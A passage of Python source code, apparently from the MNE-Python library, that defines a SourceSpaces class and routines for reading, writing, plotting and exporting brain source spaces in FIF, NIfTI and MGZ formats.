from .io.tree import dir_tree_find
from .io.tag import find_tag, read_tag
from .io.open import fiff_open
from .io.write import (start_block, end_block, write_int,
write_float_sparse_rcs, write_string,
write_float_matrix, write_int_matrix,
write_coord_trans, start_file, end_file, write_id)
from .io.pick import channel_type, _picks_to_idx
from .bem import read_bem_surfaces
from .fixes import _get_img_fdata
from .surface import (read_surface, _create_surf_spacing, _get_ico_surface,
_tessellate_sphere_surf, _get_surf_neighbors,
_normalize_vectors, _triangle_neighbors, mesh_dist,
complete_surface_info, _compute_nearest, fast_cross_3d,
_CheckInside)
from .utils import (get_subjects_dir, check_fname, logger, verbose, fill_doc,
_ensure_int, check_version, _get_call_line, warn,
_check_fname, _check_path_like, _check_sphere,
_validate_type, _check_option, _is_numeric, _pl, _suggest,
object_size, sizeof_fmt)
from .parallel import parallel_func, check_n_jobs
from .transforms import (invert_transform, apply_trans, _print_coord_trans,
combine_transforms, _get_trans,
_coord_frame_name, Transform, _str_to_frame,
_ensure_trans, read_ras_mni_t)
def read_freesurfer_lut(fname=None):
"""Read a Freesurfer-formatted LUT.
Parameters
----------
fname : str | None
The filename. Can be None to read the standard Freesurfer LUT.
Returns
-------
atlas_ids : dict
Mapping from label names to IDs.
colors : dict
Mapping from label names to colors.
"""
lut = _get_lut(fname)
names, ids = lut['name'], lut['id']
colors = np.array([lut['R'], lut['G'], lut['B'], lut['A']], float).T
atlas_ids = dict(zip(names, ids))
colors = dict(zip(names, colors))
return atlas_ids, colors
def _get_lut(fname=None):
"""Get a FreeSurfer LUT."""
_validate_type(fname, ('path-like', None), 'fname')
if fname is None:
fname = op.join(op.dirname(__file__), 'data', 'FreeSurferColorLUT.txt')
_check_fname(fname, 'read', must_exist=True)
dtype = [('id', '<i8'), ('name', 'U'),
('R', '<i8'), ('G', '<i8'), ('B', '<i8'), ('A', '<i8')]
lut = {d[0]: list() for d in dtype}
with open(fname, 'r') as fid:
for line in fid:
line = line.strip()
if line.startswith('#') or not line:
continue
line = line.split()
if len(line) != len(dtype):
raise RuntimeError(f'LUT is improperly formatted: {fname}')
for d, part in zip(dtype, line):
lut[d[0]].append(part)
lut = {d[0]: np.array(lut[d[0]], dtype=d[1]) for d in dtype}
assert len(lut['name']) > 0
return lut
def _get_lut_id(lut, label):
"""Convert a label to a LUT ID number."""
assert isinstance(label, str)
mask = (lut['name'] == label)
assert mask.sum() == 1
return lut['id'][mask]
_src_kind_dict = {
'vol': 'volume',
'surf': 'surface',
'discrete': 'discrete',
}
class SourceSpaces(list):
"""Represent a list of source space.
Currently implemented as a list of dictionaries containing the source
space information
Parameters
----------
source_spaces : list
A list of dictionaries containing the source space information.
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
Attributes
----------
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
"""
def __init__(self, source_spaces, info=None): # noqa: D102
# First check the types is actually a valid config
_validate_type(source_spaces, list, 'source_spaces')
super(SourceSpaces, self).__init__(source_spaces) # list
self.kind # will raise an error if there is a problem
if info is None:
self.info = dict()
else:
self.info = dict(info)
@property
def kind(self):
types = list()
for si, s in enumerate(self):
_validate_type(s, dict, 'source_spaces[%d]' % (si,))
types.append(s.get('type', None))
_check_option('source_spaces[%d]["type"]' % (si,),
types[-1], ('surf', 'discrete', 'vol'))
if all(k == 'surf' for k in types[:2]):
surf_check = 2
if len(types) == 2:
kind = 'surface'
else:
kind = 'mixed'
else:
surf_check = 0
if all(k == 'discrete' for k in types):
kind = 'discrete'
else:
kind = 'volume'
if any(k == 'surf' for k in types[surf_check:]):
raise RuntimeError('Invalid source space with kinds %s' % (types,))
return kind
@verbose
def plot(self, head=False, brain=None, skull=None, subjects_dir=None,
trans=None, verbose=None):
"""Plot the source space.
Parameters
----------
head : bool
If True, show head surface.
brain : bool | str
If True, show the brain surfaces. Can also be a str for
surface type (e.g., 'pial', same as True). Default is None,
which means 'white' for surface source spaces and False otherwise.
skull : bool | str | list of str | list of dict | None
Whether to plot skull surface. If string, common choices would be
'inner_skull', or 'outer_skull'. Can also be a list to plot
multiple skull surfaces. If a list of dicts, each dict must
contain the complete surface info (such as you get from
:func:`mne.make_bem_model`). True is an alias of 'outer_skull'.
The subjects bem and bem/flash folders are searched for the 'surf'
files. Defaults to None, which is False for surface source spaces,
and True otherwise.
subjects_dir : str | None
Path to SUBJECTS_DIR if it is not set in the environment.
trans : str | 'auto' | dict | None
The full path to the head<->MRI transform ``*-trans.fif`` file
produced during coregistration. If trans is None, an identity
matrix is assumed. This is only needed when the source space is in
head coordinates.
%(verbose_meth)s
Returns
-------
fig : instance of mayavi.mlab.Figure
The figure.
"""
from .viz import plot_alignment
surfaces = list()
bem = None
if brain is None:
brain = 'white' if any(ss['type'] == 'surf'
for ss in self) else False
if isinstance(brain, str):
surfaces.append(brain)
elif brain:
surfaces.append('brain')
if skull is None:
skull = False if self.kind == 'surface' else True
if isinstance(skull, str):
surfaces.append(skull)
elif skull is True:
surfaces.append('outer_skull')
elif skull is not False: # list
if isinstance(skull[0], dict): # bem
skull_map = {FIFF.FIFFV_BEM_SURF_ID_BRAIN: 'inner_skull',
FIFF.FIFFV_BEM_SURF_ID_SKULL: 'outer_skull',
FIFF.FIFFV_BEM_SURF_ID_HEAD: 'outer_skin'}
for this_skull in skull:
surfaces.append(skull_map[this_skull['id']])
bem = skull
else: # list of str
for surf in skull:
surfaces.append(surf)
if head:
surfaces.append('head')
if self[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
coord_frame = 'head'
if trans is None:
raise ValueError('Source space is in head coordinates, but no '
'head<->MRI transform was given. Please '
'specify the full path to the appropriate '
'*-trans.fif file as the "trans" parameter.')
else:
coord_frame = 'mri'
info = create_info(0, 1000., 'eeg')
return plot_alignment(
info, trans=trans, subject=self._subject,
subjects_dir=subjects_dir, surfaces=surfaces,
coord_frame=coord_frame, meg=(), eeg=False, dig=False, ecog=False,
bem=bem, src=self
)
def __getitem__(self, *args, **kwargs):
"""Get an item."""
out = super().__getitem__(*args, **kwargs)
if isinstance(out, list):
out = SourceSpaces(out)
return out
def __repr__(self): # noqa: D105
ss_repr = []
extra = []
for si, ss in enumerate(self):
ss_type = ss['type']
r = _src_kind_dict[ss_type]
if ss_type == 'vol':
if 'seg_name' in ss:
r += " (%s)" % (ss['seg_name'],)
else:
r += ", shape=%s" % (ss['shape'],)
elif ss_type == 'surf':
r += (" (%s), n_vertices=%i" % (_get_hemi(ss)[0], ss['np']))
r += ', n_used=%i' % (ss['nuse'],)
if si == 0:
extra += ['%s coords'
% (_coord_frame_name(int(ss['coord_frame'])))]
ss_repr.append('<%s>' % r)
subj = self._subject
if subj is not None:
extra += ['subject %r' % (subj,)]
sz = object_size(self)
if sz is not None:
extra += [f'~{sizeof_fmt(sz)}']
return "<SourceSpaces: [%s] %s>" % (
', '.join(ss_repr), ', '.join(extra))
@property
def _subject(self):
return self[0].get('subject_his_id', None)
def __add__(self, other):
"""Combine source spaces."""
out = self.copy()
out += other
return SourceSpaces(out)
def copy(self):
"""Make a copy of the source spaces.
Returns
-------
src : instance of SourceSpaces
The copied source spaces.
"""
return deepcopy(self)
def __deepcopy__(self, memodict):
"""Make a deepcopy."""
# don't copy read-only views (saves a ton of mem for split-vol src)
info = deepcopy(self.info, memodict)
ss = list()
for s in self:
for key in ('rr', 'nn'):
if key in s:
arr = s[key]
id_ = id(arr)
if id_ not in memodict:
if not arr.flags.writeable:
memodict[id_] = arr
ss.append(deepcopy(s, memodict))
return SourceSpaces(ss, info)
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save the source spaces to a fif file.
Parameters
----------
fname : str
File to write.
%(overwrite)s
%(verbose_meth)s
"""
write_source_spaces(fname, self, overwrite)
@verbose
def export_volume(self, fname, include_surfaces=True,
include_discrete=True, dest='mri', trans=None,
mri_resolution=False, use_lut=True, overwrite=False,
verbose=None):
"""Export source spaces to nifti or mgz file.
Parameters
----------
fname : str
Name of nifti or mgz file to write.
include_surfaces : bool
If True, include surface source spaces.
include_discrete : bool
If True, include discrete source spaces.
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of the
original T1 image. If 'surf' the coordinate system of the
FreeSurfer surface is used (Surface RAS).
trans : dict, str, or None
Either a transformation filename (usually made using mne_analyze)
or an info dict (usually opened using read_trans()). If string, an
ending of ``.fif`` or ``.fif.gz`` will be assumed to be in FIF
format, any other ending will be assumed to be a text file with a
4x4 transformation matrix (like the ``--trans`` MNE-C option.
Must be provided if source spaces are in head coordinates and
include_surfaces and mri_resolution are True.
mri_resolution : bool | str
If True, the image is saved in MRI resolution
(e.g. 256 x 256 x 256), and each source region (surface or
segmentation volume) filled in completely. If "sparse", only a
single voxel in the high-resolution MRI is filled in for each
source point.
.. versionchanged:: 0.21.0
Support for "sparse" was added.
use_lut : bool
If True, assigns a numeric value to each source space that
corresponds to a color on the freesurfer lookup table.
%(overwrite)s
.. versionadded:: 0.19
%(verbose_meth)s
Notes
-----
This method requires nibabel.
"""
_check_fname(fname, overwrite)
_validate_type(mri_resolution, (bool, str), 'mri_resolution')
if isinstance(mri_resolution, str):
_check_option('mri_resolution', mri_resolution, ["sparse"],
extra='when mri_resolution is a string')
else:
mri_resolution = bool(mri_resolution)
fname = str(fname)
# import nibabel or raise error
try:
import nibabel as nib
except ImportError:
raise ImportError('This function requires nibabel.')
# Check coordinate frames of each source space
coord_frames = np.array([s['coord_frame'] for s in self])
# Raise error if trans is not provided when head coordinates are used
# and mri_resolution and include_surfaces are true
if (coord_frames == FIFF.FIFFV_COORD_HEAD).all():
coords = 'head' # all sources in head coordinates
if mri_resolution and include_surfaces:
if trans is None:
raise ValueError('trans containing mri to head transform '
'must be provided if mri_resolution and '
'include_surfaces are true and surfaces '
'are in head coordinates')
elif trans is not None:
logger.info('trans is not needed and will not be used unless '
'include_surfaces and mri_resolution are True.')
elif (coord_frames == FIFF.FIFFV_COORD_MRI).all():
coords = 'mri' # all sources in mri coordinates
if trans is not None:
logger.info('trans is not needed and will not be used unless '
'sources are in head coordinates.')
# Raise error if all sources are not in the same space, or sources are
# not in mri or head coordinates
else:
raise ValueError('All sources must be in head coordinates or all '
'sources must be in mri coordinates.')
# use lookup table to assign values to source spaces
logger.info('Reading FreeSurfer lookup table')
# read the lookup table
lut = _get_lut()
# Setup a dictionary of source types
src_types = dict(volume=[], surface_discrete=[])
# Populate dictionary of source types
for src in self:
# volume sources
if src['type'] == 'vol':
src_types['volume'].append(src)
# surface and discrete sources
elif src['type'] in ('surf', 'discrete'):
src_types['surface_discrete'].append(src)
else:
raise ValueError('Unrecognized source type: %s.' % src['type'])
# Raise error if there are no volume source spaces
if len(src_types['volume']) == 0:
raise ValueError('Source spaces must contain at least one volume.')
# Get shape, inuse array and interpolation matrix from volume sources
src = src_types['volume'][0]
aseg_data = None
if mri_resolution:
# read the mri file used to generate volumes
if mri_resolution is True:
aseg_data = _get_img_fdata(nib.load(src['mri_file']))
# get the voxel space shape
shape3d = (src['mri_width'], src['mri_depth'],
src['mri_height'])
else:
# get the volume source space shape
# read the shape in reverse order
# (otherwise results are scrambled)
shape3d = src['shape']
# calculate affine transform for image (MRI_VOXEL to RAS)
if mri_resolution:
# MRI_VOXEL to MRI transform
transform = src['vox_mri_t']
else:
# MRI_VOXEL to MRI transform
# NOTE: 'src' indicates downsampled version of MRI_VOXEL
transform = src['src_mri_t']
# Figure out how to get from our input source space to output voxels
fro_dst_t = invert_transform(transform)
dest = transform['to']
if coords == 'head':
head_mri_t = _get_trans(trans, 'head', 'mri')[0]
fro_dst_t = combine_transforms(head_mri_t, fro_dst_t, 'head', dest)
else:
fro_dst_t = fro_dst_t
# Fill in the volumes
img = np.zeros(shape3d)
for ii, vs in enumerate(src_types['volume']):
# read the lookup table value for segmented volume
if 'seg_name' not in vs:
raise ValueError('Volume sources should be segments, '
'not the entire volume.')
# find the color value for this volume
use_id = 1.
if mri_resolution is True or use_lut:
id_ = _get_lut_id(lut, vs['seg_name'])
if use_lut:
use_id = id_
if mri_resolution == 'sparse':
idx = apply_trans(fro_dst_t, vs['rr'][vs['vertno']])
idx = tuple(idx.round().astype(int).T)
elif mri_resolution is True: # fill the represented vol
# get the values for this volume
idx = (aseg_data == id_)
else:
assert mri_resolution is False
idx = vs['inuse'].reshape(shape3d, order='F').astype(bool)
img[idx] = use_id
# loop through the surface and discrete source spaces
# get the surface names (assumes left, right order. may want
# to add these names during source space generation
for src in src_types['surface_discrete']:
val = 1
if src['type'] == 'surf':
if not include_surfaces:
continue
if use_lut:
surf_name = {
FIFF.FIFFV_MNE_SURF_LEFT_HEMI: 'Left',
FIFF.FIFFV_MNE_SURF_RIGHT_HEMI: 'Right',
}[src['id']] + '-Cerebral-Cortex'
val = _get_lut_id(lut, surf_name)
else:
assert src['type'] == 'discrete'
if not include_discrete:
continue
if use_lut:
logger.info('Discrete sources do not have values on '
'the lookup table. Defaulting to 1.')
# convert vertex positions from their native space
# (either HEAD or MRI) to MRI_VOXEL space
if mri_resolution is True:
use_rr = src['rr']
else:
assert mri_resolution is False or mri_resolution == 'sparse'
use_rr = src['rr'][src['vertno']]
srf_vox = apply_trans(fro_dst_t['trans'], use_rr)
# convert to numeric indices
ix_, iy_, iz_ = srf_vox.T.round().astype(int)
# clip indices outside of volume space
ix = np.clip(ix_, 0, shape3d[0] - 1),
iy = np.clip(iy_, 0, shape3d[1] - 1)
iz = np.clip(iz_, 0, shape3d[2] - 1)
# compare original and clipped indices
n_diff = ((ix_ != ix) | (iy_ != iy) | (iz_ != iz)).sum()
# generate use warnings for clipping
if n_diff > 0:
warn(f'{n_diff} {src["type"]} vertices lay outside of volume '
f'space. Consider using a larger volume space.')
# get surface id or use default value
# update image to include surface voxels
img[ix, iy, iz] = val
if dest == 'mri':
# combine with MRI to RAS transform
transform = combine_transforms(
transform, vs['mri_ras_t'],
transform['from'], vs['mri_ras_t']['to'])
# now setup the affine for volume image
affine = transform['trans'].copy()
# make sure affine converts from m to mm
affine[:3] *= 1e3
# setup image for file
if fname.endswith(('.nii', '.nii.gz')): # save as nifit
# setup the nifti header
hdr = nib.Nifti1Header()
hdr.set_xyzt_units('mm')
# save the nifti image
img = nib.Nifti1Image(img, affine, header=hdr)
elif fname.endswith('.mgz'): # save as mgh
# convert to float32 (float64 not currently supported)
img = img.astype('float32')
# save the mgh image
img = nib.freesurfer.mghformat.MGHImage(img, affine)
else:
raise(ValueError('Unrecognized file extension'))
# write image to file
nib.save(img, fname)
def _add_patch_info(s):
"""Patch information in a source space.
Generate the patch information from the 'nearest' vector in
a source space. For vertex in the source space it provides
the list of neighboring vertices in the high resolution
triangulation.
Parameters
----------
s : dict
The source space.
"""
nearest = s['nearest']
if nearest is None:
s['pinfo'] = None
s['patch_inds'] = None
return
logger.info(' Computing patch statistics...')
indn = np.argsort(nearest)
nearest_sorted = nearest[indn]
steps = np.where(nearest_sorted[1:] != nearest_sorted[:-1])[0] + 1
starti = np.r_[[0], steps]
stopi = np.r_[steps, [len(nearest)]]
pinfo = list()
for start, stop in zip(starti, stopi):
pinfo.append(np.sort(indn[start:stop]))
s['pinfo'] = pinfo
# compute patch indices of the in-use source space vertices
patch_verts = nearest_sorted[steps - 1]
s['patch_inds'] = np.searchsorted(patch_verts, s['vertno'])
logger.info(' Patch information added...')
@verbose
def _read_source_spaces_from_tree(fid, tree, patch_stats=False, verbose=None):
"""Read the source spaces from a FIF file.
Parameters
----------
fid : file descriptor
An open file descriptor.
tree : dict
The FIF tree structure if source is a file id.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
%(verbose)s
Returns
-------
src : SourceSpaces
The source spaces.
"""
# Find all source spaces
spaces = dir_tree_find(tree, FIFF.FIFFB_MNE_SOURCE_SPACE)
if len(spaces) == 0:
raise ValueError('No source spaces found')
src = list()
for s in spaces:
logger.info(' Reading a source space...')
this = _read_one_source_space(fid, s)
logger.info(' [done]')
if patch_stats:
_complete_source_space_info(this)
src.append(this)
logger.info(' %d source spaces read' % len(spaces))
return SourceSpaces(src)
@verbose
def read_source_spaces(fname, patch_stats=False, verbose=None):
"""Read the source spaces from a FIF file.
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
%(verbose)s
Returns
-------
src : SourceSpaces
The source spaces.
See Also
--------
write_source_spaces, setup_source_space, setup_volume_source_space
"""
# be more permissive on read than write (fwd/inv can contain src)
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
'_src.fif', '_src.fif.gz',
'-fwd.fif', '-fwd.fif.gz',
'_fwd.fif', '_fwd.fif.gz',
'-inv.fif', '-inv.fif.gz',
'_inv.fif', '_inv.fif.gz'))
ff, tree, _ = fiff_open(fname)
with ff as fid:
src = _read_source_spaces_from_tree(fid, tree, patch_stats=patch_stats,
verbose=verbose)
src.info['fname'] = fname
node = dir_tree_find(tree, FIFF.FIFFB_MNE_ENV)
if node:
node = node[0]
for p in range(node['nent']):
kind = node['directory'][p].kind
pos = node['directory'][p].pos
tag = read_tag(fid, pos)
if kind == FIFF.FIFF_MNE_ENV_WORKING_DIR:
src.info['working_dir'] = tag.data
elif kind == FIFF.FIFF_MNE_ENV_COMMAND_LINE:
src.info['command_line'] = tag.data
return src
def _read_one_source_space(fid, this):
"""Read one source space."""
res = dict()
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_ID)
if tag is None:
res['id'] = int(FIFF.FIFFV_MNE_SURF_UNKNOWN)
else:
res['id'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE)
if tag is None:
raise ValueError('Unknown source space type')
else:
src_type = int(tag.data)
if src_type == FIFF.FIFFV_MNE_SPACE_SURFACE:
res['type'] = 'surf'
elif src_type == FIFF.FIFFV_MNE_SPACE_VOLUME:
res['type'] = 'vol'
elif src_type == FIFF.FIFFV_MNE_SPACE_DISCRETE:
res['type'] = 'discrete'
else:
raise ValueError('Unknown source space type (%d)' % src_type)
if res['type'] == 'vol':
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS)
if tag is not None:
res['shape'] = tuple(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_COORD_TRANS)
if tag is not None:
res['src_mri_t'] = tag.data
parent_mri = dir_tree_find(this, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
if len(parent_mri) == 0:
# MNE 2.7.3 (and earlier) didn't store necessary information
# about volume coordinate translations. Although there is a
# FFIF_COORD_TRANS in the higher level of the FIFF file, this
# doesn't contain all the info we need. Safer to return an
# error unless a user really wants us to add backward compat.
raise ValueError('Can not find parent MRI location. The volume '
'source space may have been made with an MNE '
'version that is too old (<= 2.7.3). Consider '
'updating and regenerating the inverse.')
mri = parent_mri[0]
for d in mri['directory']:
if d.kind == FIFF.FIFF_COORD_TRANS:
tag = read_tag(fid, d.pos)
trans = tag.data
if trans['from'] == FIFF.FIFFV_MNE_COORD_MRI_VOXEL:
res['vox_mri_t'] = tag.data
if trans['to'] == FIFF.FIFFV_MNE_COORD_RAS:
res['mri_ras_t'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR)
if tag is not None:
res['interpolator'] = tag.data
if tag.data.data.size == 0:
del res['interpolator']
else:
logger.info("Interpolation matrix for MRI not found.")
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE)
if tag is not None:
res['mri_file'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MRI_WIDTH)
if tag is not None:
res['mri_width'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_HEIGHT)
if tag is not None:
res['mri_height'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_DEPTH)
if tag is not None:
res['mri_depth'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MNE_FILE_NAME)
if tag is not None:
res['mri_volume_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS)
if tag is not None:
nneighbors = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS)
offset = 0
neighbors = []
for n in nneighbors:
neighbors.append(tag.data[offset:offset + n])
offset += n
res['neighbor_vert'] = neighbors
tag = find_tag(fid, this, FIFF.FIFF_COMMENT)
if tag is not None:
res['seg_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS)
if tag is None:
raise ValueError('Number of vertices not found')
res['np'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_BEM_SURF_NTRI)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI)
if tag is None:
res['ntri'] = 0
else:
res['ntri'] = int(tag.data)
else:
res['ntri'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COORD_FRAME)
if tag is None:
raise ValueError('Coordinate frame information not found')
res['coord_frame'] = tag.data[0]
# Vertices, normals, and triangles
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS)
if tag is None:
raise ValueError('Vertex data not found')
res['rr'] = tag.data.astype(np.float64) # double precision for mayavi
if res['rr'].shape[0] != res['np']:
raise ValueError('Vertex information is incorrect')
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS)
if tag is None:
raise ValueError('Vertex normals not found')
res['nn'] = tag.data.copy()
if res['nn'].shape[0] != res['np']:
raise ValueError('Vertex normal information is incorrect')
if res['ntri'] > 0:
tag = find_tag(fid, this, FIFF.FIFF_BEM_SURF_TRIANGLES)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES)
if tag is None:
raise ValueError('Triangulation not found')
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
if res['tris'].shape[0] != res['ntri']:
raise ValueError('Triangulation information is incorrect')
else:
res['tris'] = None
# Which vertices are active
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE)
if tag is None:
res['nuse'] = 0
res['inuse'] = np.zeros(res['nuse'], dtype=np.int64)
res['vertno'] = None
else:
res['nuse'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION)
if tag is None:
raise ValueError('Source selection information missing')
res['inuse'] = tag.data.astype(np.int64).T
if len(res['inuse']) != res['np']:
raise ValueError('Incorrect number of entries in source space '
'selection')
res['vertno'] = np.where(res['inuse'])[0]
# Use triangulation
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES)
if tag1 is None or tag2 is None:
res['nuse_tri'] = 0
res['use_tris'] = None
else:
res['nuse_tri'] = tag1.data
res['use_tris'] = tag2.data - 1 # index start at 0 in Python
# Patch-related information
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST)
if tag1 is None or tag2 is None:
res['nearest'] = None
res['nearest_dist'] = None
else:
res['nearest'] = tag1.data
res['nearest_dist'] = tag2.data.T
_add_patch_info(res)
# Distances
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT)
if tag1 is None or tag2 is None:
res['dist'] = None
res['dist_limit'] = None
else:
res['dist'] = tag1.data
res['dist_limit'] = tag2.data
# Add the upper triangle
res['dist'] = res['dist'] + res['dist'].T
if (res['dist'] is not None):
logger.info(' Distance information added...')
tag = find_tag(fid, this, FIFF.FIFF_SUBJ_HIS_ID)
if tag is None:
res['subject_his_id'] = None
else:
res['subject_his_id'] = tag.data
return res
@verbose
def _complete_source_space_info(this, verbose=None):
"""Add more info on surface."""
# Main triangulation
logger.info(' Completing triangulation info...')
this['tri_area'] = np.zeros(this['ntri'])
r1 = this['rr'][this['tris'][:, 0], :]
r2 = this['rr'][this['tris'][:, 1], :]
r3 = this['rr'][this['tris'][:, 2], :]
this['tri_cent'] = (r1 + r2 + r3) / 3.0
this['tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
this['tri_area'] = _normalize_vectors(this['tri_nn']) / 2.0
logger.info('[done]')
# Selected triangles
logger.info(' Completing selection triangulation info...')
if this['nuse_tri'] > 0:
r1 = this['rr'][this['use_tris'][:, 0], :]
r2 = this['rr'][this['use_tris'][:, 1], :]
r3 = this['rr'][this['use_tris'][:, 2], :]
this['use_tri_cent'] = (r1 + r2 + r3) / 3.0
this['use_tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
this['use_tri_area'] = np.linalg.norm(this['use_tri_nn'], axis=1) / 2.
logger.info('[done]')
def find_source_space_hemi(src):
"""Return the hemisphere id for a source space.
Parameters
----------
src : dict
The source space to investigate.
Returns
-------
hemi : int
Deduced hemisphere id.
"""
xave = src['rr'][:, 0].sum()
if xave < 0:
hemi = int(FIFF.FIFFV_MNE_SURF_LEFT_HEMI)
else:
hemi = int(FIFF.FIFFV_MNE_SURF_RIGHT_HEMI)
return hemi
def label_src_vertno_sel(label, src):
"""Find vertex numbers and indices from label.
Parameters
----------
label : Label
Source space label.
src : dict
Source space.
Returns
-------
vertices : list of length 2
Vertex numbers for lh and rh.
src_sel : array of int (len(idx) = len(vertices[0]) + len(vertices[1]))
Indices of the selected vertices in sourse space.
"""
if src[0]['type'] != 'surf':
return Exception('Labels are only supported with surface source '
'spaces')
vertno = [src[0]['vertno'], src[1]['vertno']]
if label.hemi == 'lh':
vertno_sel = np.intersect1d(vertno[0], label.vertices)
src_sel = np.searchsorted(vertno[0], vertno_sel)
vertno[0] = vertno_sel
vertno[1] = np.array([], int)
elif label.hemi == 'rh':
vertno_sel = np.intersect1d(vertno[1], label.vertices)
src_sel = np.searchsorted(vertno[1], vertno_sel) + len(vertno[0])
vertno[0] = np.array([], int)
vertno[1] = vertno_sel
elif label.hemi == 'both':
vertno_sel_lh = np.intersect1d(vertno[0], label.lh.vertices)
src_sel_lh = np.searchsorted(vertno[0], vertno_sel_lh)
vertno_sel_rh = np.intersect1d(vertno[1], label.rh.vertices)
src_sel_rh = np.searchsorted(vertno[1], vertno_sel_rh) + len(vertno[0])
src_sel = np.hstack((src_sel_lh, src_sel_rh))
vertno = [vertno_sel_lh, vertno_sel_rh]
else:
raise Exception("Unknown hemisphere type")
return vertno, src_sel
def _get_vertno(src):
return [s['vertno'] for s in src]
###############################################################################
# Write routines
@verbose
def _write_source_spaces_to_fid(fid, src, verbose=None):
"""Write the source spaces to a FIF file.
Parameters
----------
fid : file descriptor
An open file descriptor.
src : list
The list of source spaces.
%(verbose)s
"""
for s in src:
logger.info(' Write a source space...')
start_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
_write_one_source_space(fid, s, verbose)
end_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
logger.info(' [done]')
logger.info(' %d source spaces written' % len(src))
@verbose
def write_source_spaces(fname, src, overwrite=False, verbose=None):
"""Write source spaces to a file.
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
src : SourceSpaces
The source spaces (as returned by read_source_spaces).
%(overwrite)s
%(verbose)s
See Also
--------
read_source_spaces
"""
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
'_src.fif', '_src.fif.gz'))
_check_fname(fname, overwrite=overwrite)
fid = start_file(fname)
start_block(fid, FIFF.FIFFB_MNE)
if src.info:
start_block(fid, FIFF.FIFFB_MNE_ENV)
write_id(fid, FIFF.FIFF_BLOCK_ID)
data = src.info.get('working_dir', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_WORKING_DIR, data)
data = src.info.get('command_line', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_COMMAND_LINE, data)
end_block(fid, FIFF.FIFFB_MNE_ENV)
_write_source_spaces_to_fid(fid, src, verbose)
end_block(fid, FIFF.FIFFB_MNE)
end_file(fid)
def _write_one_source_space(fid, this, verbose=None):
"""Write one source space."""
from scipy import sparse
if this['type'] == 'surf':
src_type = FIFF.FIFFV_MNE_SPACE_SURFACE
elif this['type'] == 'vol':
src_type = FIFF.FIFFV_MNE_SPACE_VOLUME
elif this['type'] == 'discrete':
src_type = FIFF.FIFFV_MNE_SPACE_DISCRETE
else:
raise ValueError('Unknown source space type (%s)' % this['type'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE, src_type)
if this['id'] >= 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_ID, this['id'])
data = this.get('subject_his_id', None)
if data:
write_string(fid, FIFF.FIFF_SUBJ_HIS_ID, data)
write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, this['coord_frame'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS, this['np'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS, this['rr'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS, this['nn'])
# Which vertices are active
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION, this['inuse'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE, this['nuse'])
if this['ntri'] > 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI, this['ntri'])
